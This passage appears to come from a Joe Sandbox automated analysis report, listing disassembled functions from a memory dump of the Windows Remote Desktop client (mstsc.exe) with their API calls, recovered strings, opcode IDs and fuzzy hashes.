                                                                                                              • Opcode ID: fb033d4a63523055d4658149df4171a42f0acfed40595ba89691f8dbc88a22c8
                                                                                                              • Instruction ID: 182ddd32328e943c17bd0aeec1d209eec06b31ff85a9e4a92e21de8742373a03
                                                                                                              • Opcode Fuzzy Hash: fb033d4a63523055d4658149df4171a42f0acfed40595ba89691f8dbc88a22c8
                                                                                                              • Instruction Fuzzy Hash: C6123671201340DFDB18EF19DC88A6ABBA5FF88320F15455AF9459B2A2CB79EC41CF91
                                                                                                              Function 0088700C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 209registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020019,?,?,00000000,00000000,00000000), ref: 008870E1
                                                                                                              • wcsncpy_s.MSVCRT ref: 008871D4
                                                                                                              • wcsncat_s.MSVCRT ref: 008871EB
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00000000,00000000), ref: 00887216
                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000), ref: 008872BB
                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000), ref: 008872D0
                                                                                                                • Part of subcall function 00887413: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,80004001,00000000,00000000), ref: 0088743D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpen$QueryValuewcsncat_swcsncpy_s
                                                                                                              • String ID: Domain
                                                                                                              • API String ID: 1312607024-2684689213
                                                                                                              • Opcode ID: 4d18942f8e54387f29e2a12d4ed9decdd9ec9a6c7d86416b82f297a8b1dde41e
                                                                                                              • Instruction ID: b29e306ab121813a6d90a730c4fa318c2031375d77c26c3422939db1013ff571
                                                                                                              • Opcode Fuzzy Hash: 4d18942f8e54387f29e2a12d4ed9decdd9ec9a6c7d86416b82f297a8b1dde41e
                                                                                                              • Instruction Fuzzy Hash: 7B8162759042299FDB25AF68DD88B9AB7B5FF88310F2041A9E81AD7350DB30DE81CF50
                                                                                                              Function 0080B1AE Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 203registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0079B721: _vsnwprintf.MSVCRT ref: 0079B753
                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,00000000), ref: 0080B23B
                                                                                                              • RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000), ref: 0080B334
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0080B3B2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValue_vsnwprintf
                                                                                                              • String ID: Created$Opened$SOFTWARE\Microsoft\Terminal Server Client\%s$\
                                                                                                              • API String ID: 4039617372-1640073806
                                                                                                              • Opcode ID: 9edc1125a0c33751d89e6614de2ce07e08053f220368a634adadc6b3b902e8bf
                                                                                                              • Instruction ID: ae8cd99bbfb6c9b26e53c48f614d501cb100f9f706e15f4b19a9aef6bea97002
                                                                                                              • Opcode Fuzzy Hash: 9edc1125a0c33751d89e6614de2ce07e08053f220368a634adadc6b3b902e8bf
                                                                                                              • Instruction Fuzzy Hash: E561BF32204340AFEBA9DF58DC89E6A3BE6FB88304F25045EF551CB2E2D775C9149B52
                                                                                                              Function 007BF100 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 331COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • QI for IMsRdpClientNonScriptable3 failed!, xrefs: 007BF1A1
                                                                                                              • IMsRdpDevice::get_DeviceInstanceId failed, xrefs: 007BF489
                                                                                                              • IMsRdpDeviceCollection::get_DeviceByIndex failed!, xrefs: 007BF4D4
                                                                                                              • DynamicDevices, xrefs: 007BF400
                                                                                                              • IMsRdpDeviceCollection::DeviceCount failed!, xrefs: 007BF26C
                                                                                                              • IMsRdpClient5::get_DeviceCollection failed!, xrefs: 007BF213
                                                                                                              • StringCchCopy failed, xrefs: 007BF543, 007BF58D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID: DynamicDevices$IMsRdpClient5::get_DeviceCollection failed!$IMsRdpDevice::get_DeviceInstanceId failed$IMsRdpDeviceCollection::DeviceCount failed!$IMsRdpDeviceCollection::get_DeviceByIndex failed!$QI for IMsRdpClientNonScriptable3 failed!$StringCchCopy failed
                                                                                                              • API String ID: 2221118986-430872028
                                                                                                              • Opcode ID: 21fd685182bedb019eac2c841290cb9f6e3567a7f54890eae006a1e4635b1250
                                                                                                              • Instruction ID: 5b80bbfd32be3afb98e6497cea1173594b8dea13f4e98ee6a73ce903b3e140c0
                                                                                                              • Opcode Fuzzy Hash: 21fd685182bedb019eac2c841290cb9f6e3567a7f54890eae006a1e4635b1250
                                                                                                              • Instruction Fuzzy Hash: 92C1A170500204DBDF29DF18DC99BAA37A6BF80714F1480B9E449972A2DF3CDD96CB91
                                                                                                              Function 00798010 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 44libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                              • GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: #C}$Advapi32.dll$EventActivityIdControl$Microsoft.Windows.RemoteDesktop
                                                                                                              • API String ID: 4061214504-2156307834
                                                                                                              • Opcode ID: 8d2905e31b948ab15a4d1358f9118a01bfdb7c0adf621d8085484339bc78c10b
                                                                                                              • Instruction ID: 955ffb0191904b4092c731fc444faf61cbc620659c96fc7d431aaac02fb84e7b
                                                                                                              • Opcode Fuzzy Hash: 8d2905e31b948ab15a4d1358f9118a01bfdb7c0adf621d8085484339bc78c10b
                                                                                                              • Instruction Fuzzy Hash: 90014F35A01209AFDB10EBA9DD0AABFBBB5FB44751F400025E905F2290DA709D058BA2
                                                                                                              Function 007A91F0 Relevance: 12.2, APIs: 8, Instructions: 166windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 007A97C5: IsWindow.USER32(?), ref: 007A97ED
                                                                                                                • Part of subcall function 007A97C5: GetWindowLongW.USER32(?,000000F0), ref: 007A981A
                                                                                                                • Part of subcall function 007A97C5: GetWindowLongW.USER32(?,000000EC), ref: 007A982D
                                                                                                                • Part of subcall function 007A97C5: GetMenu.USER32(?), ref: 007A9850
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 007A9287
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 007A92B1
                                                                                                              • GetWindowRect.USER32(?,00000006), ref: 007A92BC
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 007A92E3
                                                                                                              • ShowWindow.USER32(?,00000009), ref: 007A9337
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000006,?,00000002), ref: 007A9349
                                                                                                              • SetFocus.USER32(00000000), ref: 007A937E
                                                                                                              • GetLastError.KERNEL32 ref: 007A9388
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Long$Text$ErrorFocusLastMenuRectShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3461709743-0
                                                                                                              • Opcode ID: da0ac6f6d2f5edc43eeadc07c0815f2067e266564cd0004a2ab8f1036602843e
                                                                                                              • Instruction ID: f4542d1407c94c69aa3b0cf9ab9aa7a3c9cb210f8c9e7e67db1264c782f4a00a
                                                                                                              • Opcode Fuzzy Hash: da0ac6f6d2f5edc43eeadc07c0815f2067e266564cd0004a2ab8f1036602843e
                                                                                                              • Instruction Fuzzy Hash: 7B514C75A006059FEB18DF68C899BBFBBB5FF89300F10461DEA56D7291DB38A901CB50
                                                                                                              Function 007DE0B0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EventActivityIdControl.ADVAPI32(00000001,?), ref: 007DE0E1
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 007DE0EC
                                                                                                              • EventActivityIdControl.ADVAPI32(00000002,?), ref: 007DE184
                                                                                                              • EventActivityIdControl.ADVAPI32(00000002,?), ref: 007DE21C
                                                                                                              • EventActivityIdControl.ADVAPI32(00000002,?), ref: 007DE3CB
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              Strings
                                                                                                              • Failed to create the endpoint connection UUID, xrefs: 007DE1F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ActivityControlEvent$AddressAllocFreeHandleLibraryMessageModuleProcStringTrace
                                                                                                              • String ID: Failed to create the endpoint connection UUID
                                                                                                              • API String ID: 2855200568-2965209518
                                                                                                              • Opcode ID: 3c3e1242dacfa30e4abbf411b89a7eb2d9b1064752c07048a6594a309b01780a
                                                                                                              • Instruction ID: fa005a1ec1ac6199ab11e2d5008badec22a47eab8d3a75e8a14dbbe42f3b878c
                                                                                                              • Opcode Fuzzy Hash: 3c3e1242dacfa30e4abbf411b89a7eb2d9b1064752c07048a6594a309b01780a
                                                                                                              • Instruction Fuzzy Hash: 64A16E712047009FDB2AEF58D889F2A7BBABF48310F15445AF945DB3A2D739E841CB51
                                                                                                              Function 008021C0 Relevance: 10.8, APIs: 5, Strings: 2, Instructions: 254memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000,?), ref: 008022D9
                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 008023C6
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?), ref: 00802420
                                                                                                              • LocalFree.KERNEL32(00000000), ref: 008024E1
                                                                                                                • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
                                                                                                                • Part of subcall function 007A718E: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000A,0079A670,00000004,007D428A,0000000A,00000000,00000000,00000000,00000000,0000000A,?,007D428A), ref: 007A71E2
                                                                                                              • LocalFree.KERNEL32(?), ref: 008024EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Local$AllocFree$ActivityControlEventMessageTracememcpy
                                                                                                              • String ID: RecordToString failed$ppwszSettingsStore
                                                                                                              • API String ID: 3711784381-3595829931
                                                                                                              • Opcode ID: 077a424551abe23e6081679994e7b2b4cc62640166f1bd9defee646565ff1d70
                                                                                                              • Instruction ID: b99d998810c2ffa6da304f03d7195c1312708ba26e385cd0af2d253cbec9953e
                                                                                                              • Opcode Fuzzy Hash: 077a424551abe23e6081679994e7b2b4cc62640166f1bd9defee646565ff1d70
                                                                                                              • Instruction Fuzzy Hash: 55A19C712043419FD799DF58C888B2ABBE6FB88314F14455DF948DB2E2DBB8C884CB56
                                                                                                              Function 0080912C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 130COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00809150
                                                                                                              • memset.MSVCRT ref: 00809166
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 0079686C: TraceMessage.ADVAPI32(00000008,?,0000002B,00781B08,0000000B,0088B068,00000004,00000000,00000005,00000000,00000000,00000000,00000000,?,007DBBCC,0079A670), ref: 007968AC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                              • String ID: %d.%d.%d.%d$%s.%d$GetMSRDCWFileVersion Failed !$StringCchPrintf failed!$pszVersion
                                                                                                              • API String ID: 2883347319-641655834
                                                                                                              • Opcode ID: bd833530e171706849da87aef3e950c5a027ea803ae5b3a74ebb3d13d51ca30f
                                                                                                              • Instruction ID: adbf8ae76bb7949aa76ae670192945f8ce945dfe8cd581d16fe1454bc0fd58e3
                                                                                                              • Opcode Fuzzy Hash: bd833530e171706849da87aef3e950c5a027ea803ae5b3a74ebb3d13d51ca30f
                                                                                                              • Instruction Fuzzy Hash: D7412871640214BFEBA8EB58DC4AF6A37A9FB48710F140099F944DB2D3DA39CD548762
                                                                                                              Function 007D41DA Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 120libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(shell32.dll,?,?,00000000,?,?,?,?,?,?,?,?,?,007DAD2C,?,00000001), ref: 007D4206
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 007D421C
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,007DAD2C,?,00000001,?,00000000,00000000), ref: 007D42FE
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 007A718E: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000A,0079A670,00000004,007D428A,0000000A,00000000,00000000,00000000,00000000,0000000A,?,007D428A), ref: 007A71E2
                                                                                                              Strings
                                                                                                              • SetCurrentProcessExplicitAppUserModelID, xrefs: 007D4216
                                                                                                              • Microsoft.Windows.RemoteDesktop, xrefs: 007D41F2
                                                                                                              • shell32.dll, xrefs: 007D41FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeProc$HandleLoadMessageModuleTrace
                                                                                                              • String ID: Microsoft.Windows.RemoteDesktop$SetCurrentProcessExplicitAppUserModelID$shell32.dll
                                                                                                              • API String ID: 2109255295-1123326357
                                                                                                              • Opcode ID: 07fd1df72e10dfa49003633a87ce85513f05171a25e754b3ccfd3a0a4d70dab8
                                                                                                              • Instruction ID: 221adbc06287a5a1bb8ab7945cd18956c55a547cf933154ebc59f095fd73e529
                                                                                                              • Opcode Fuzzy Hash: 07fd1df72e10dfa49003633a87ce85513f05171a25e754b3ccfd3a0a4d70dab8
                                                                                                              • Instruction Fuzzy Hash: 0E41C231200344EBEB29AF5DD88DF153BA6BB45318F64005BF5019B2E2CB7DE8859B42
                                                                                                              Function 007D0050 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 007D00D1
                                                                                                              • GetSystemMetrics.USER32(0000000B), ref: 007D00EF
                                                                                                              • GetDlgItem.USER32(?,00003364), ref: 007D0104
                                                                                                              • EndDialog.USER32(?,00000065), ref: 007D0161
                                                                                                              • EndDialog.USER32(?,00000003), ref: 007D0181
                                                                                                              Strings
                                                                                                              • mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7, xrefs: 007D0192
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DialogMetricsSystem$Item
                                                                                                              • String ID: mshelp://windows/?id=7704b5cf-ddb8-4062-acb3-0da9b2b916d7
                                                                                                              • API String ID: 1735843999-504666242
                                                                                                              • Opcode ID: 51eee849e31e3db31ecd84a4dbbd25813c841c3249fab609e0543780869f0a71
                                                                                                              • Instruction ID: e337f7ceceea6d210183b619e7f481b8c7b68c925484bd37e43d862fa9a364ea
                                                                                                              • Opcode Fuzzy Hash: 51eee849e31e3db31ecd84a4dbbd25813c841c3249fab609e0543780869f0a71
                                                                                                              • Instruction Fuzzy Hash: 8341AF31240209FBDB159F68DC09FAE7B76FF48720F04421AFA099A6A0D776D921DBD1
                                                                                                              Function 007C91EE Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000032FF), ref: 007C9246
                                                                                                              • GetWindowRect.USER32(00000000,00000004), ref: 007C9260
                                                                                                              • CreateDialogIndirectParamW.USER32(00000110,00000000,?,0081B0B0,?), ref: 007C92A4
                                                                                                              • ShowWindow.USER32(00000000,00000004,?,?,00000004,?,?,?,?), ref: 007C92B3
                                                                                                              • GetDlgItem.USER32(?,00001394), ref: 007C92C1
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003,?,?,00000004,?,?,?,?), ref: 007C92D6
                                                                                                              • ShowWindow.USER32(00000000,00000000,?,?,00000004,?,?,?,?), ref: 007C92EC
                                                                                                                • Part of subcall function 00888456: malloc.MSVCRT ref: 0088846E
                                                                                                                • Part of subcall function 0081AD5B: memset.MSVCRT ref: 0081AD92
                                                                                                                • Part of subcall function 0081AD5B: memset.MSVCRT ref: 0081ADBC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ItemShowmemset$CreateDialogIndirectParamRectmalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1274338977-0
                                                                                                              • Opcode ID: 93525c70a8f66bb430ea6e64e2def57645d9bdabfaf9e2f735ccafa08eac580d
                                                                                                              • Instruction ID: 6e01d33e508f26d3bf1882e43cf5f7b682156bbe20b601e50e98669cde936beb
                                                                                                              • Opcode Fuzzy Hash: 93525c70a8f66bb430ea6e64e2def57645d9bdabfaf9e2f735ccafa08eac580d
                                                                                                              • Instruction Fuzzy Hash: 86318031601204AFDF11AF69CD89EAB7B69FF45711F048079BE099E196DB749900CBA1
                                                                                                              Function 007AA100 Relevance: 10.6, APIs: 7, Instructions: 84windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SelectPalette.GDI32(?,?,00000000), ref: 007AA140
                                                                                                              • RealizePalette.GDI32(?), ref: 007AA149
                                                                                                              • SelectPalette.GDI32(?,00000000,00000001), ref: 007AA177
                                                                                                              • GetClientRect.USER32(?,?), ref: 007AA199
                                                                                                              • CreateSolidBrush.GDI32(00FFFFFF), ref: 007AA1A4
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 007AA1AC
                                                                                                              • PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 007AA1C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PaletteSelect$BrushClientCreateObjectRealizeRectSolid
                                                                                                              • String ID:
                                                                                                              • API String ID: 1484475077-0
                                                                                                              • Opcode ID: 169a8061ecc39b3fd7efaa4409b4dd868f5a56765eedb061b2fa1b820d69eb52
                                                                                                              • Instruction ID: d2687790ddbfbb04cc8b0d1b2e598c8a15f3e1571c825d2dad1012f9e00a021f
                                                                                                              • Opcode Fuzzy Hash: 169a8061ecc39b3fd7efaa4409b4dd868f5a56765eedb061b2fa1b820d69eb52
                                                                                                              • Instruction Fuzzy Hash: 32217C35601609BFDB159FA8DC89FAFB7B8FF49310F144529B606D2190CB78AD41CBA2
                                                                                                              Function 007C5129 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsDlgButtonChecked.USER32(?,00003328), ref: 007C513A
                                                                                                              • IsDlgButtonChecked.USER32(?,00003330), ref: 007C514D
                                                                                                              • IsDlgButtonChecked.USER32(?,0000332F), ref: 007C5165
                                                                                                              • IsDlgButtonChecked.USER32(?,00003329), ref: 007C517D
                                                                                                              • IsDlgButtonChecked.USER32(?,0000332A), ref: 007C5192
                                                                                                              • IsDlgButtonChecked.USER32(?,0000332B), ref: 007C51A7
                                                                                                              • IsDlgButtonChecked.USER32(?,0000332C), ref: 007C51BC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ButtonChecked
                                                                                                              • String ID:
                                                                                                              • API String ID: 1719414920-0
                                                                                                              • Opcode ID: e2d6726ab6230a9e6c2b1e32b8e2dd890c71c3def10049f7643c71a308de6b09
                                                                                                              • Instruction ID: 963740901077da1c396f11a701f1093631264599974c227383821803b6fc45fc
                                                                                                              • Opcode Fuzzy Hash: e2d6726ab6230a9e6c2b1e32b8e2dd890c71c3def10049f7643c71a308de6b09
                                                                                                              • Instruction Fuzzy Hash: 5821A171600759BBEB255F26BC0CF027F65FB14750F25812CF805D51E1EB6AE9918780
                                                                                                              Function 008070A1 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 132memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00883E7C: EventActivityIdControl.ADVAPI32(00000001,00000000,00000000,00000000,0088B068,?), ref: 00883E9E
                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000,00000000,00000000,?,?,?,0081C408), ref: 00807186
                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00807230
                                                                                                                • Part of subcall function 0079B721: _vsnwprintf.MSVCRT ref: 0079B753
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Local$ActivityAllocControlEventFree_vsnwprintf
                                                                                                              • String ID: %s\%s$Memory allocation failed$Servers$StringCchPrintf failed
                                                                                                              • API String ID: 3268872356-1330720887
                                                                                                              • Opcode ID: f1b99af8156b5b30a0e7a56dd41edc45c5814d99705cd3d9476d5a66a8463954
                                                                                                              • Instruction ID: 6a8c53ac6b20ca2778df87c052370eff38eedb1c6b09ff2ac83396369f922dcb
